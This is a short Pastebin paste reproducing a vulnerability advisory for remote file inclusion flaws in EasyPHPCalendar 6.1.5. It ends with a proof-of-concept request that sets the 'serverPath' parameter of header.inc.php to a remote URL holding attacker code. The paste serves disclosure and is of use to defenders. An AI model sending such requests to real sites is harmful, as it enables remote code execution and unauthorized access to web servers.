Scorz-Root

'header.inc.php?serverPath' Remote File Inclusion

Dec 16th, 2017
1,584
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.63 KB | None | 0 0
  1. source: http://www.securityfocus.com/bid/14131/info
  2.    
  3. EasyPHPCalendar is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
  4.    
  5. An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
  6.    
  7. These issues reportedly affect EasyPHPCalendar version 6.1.5; other versions may also be vulnerable.
  8.  
  9. http://www.example.com/calendar/events/header.inc.php?serverPath=http://www.example.com/[remote code]
Advertisement
Add Comment
Please, Sign In to add comment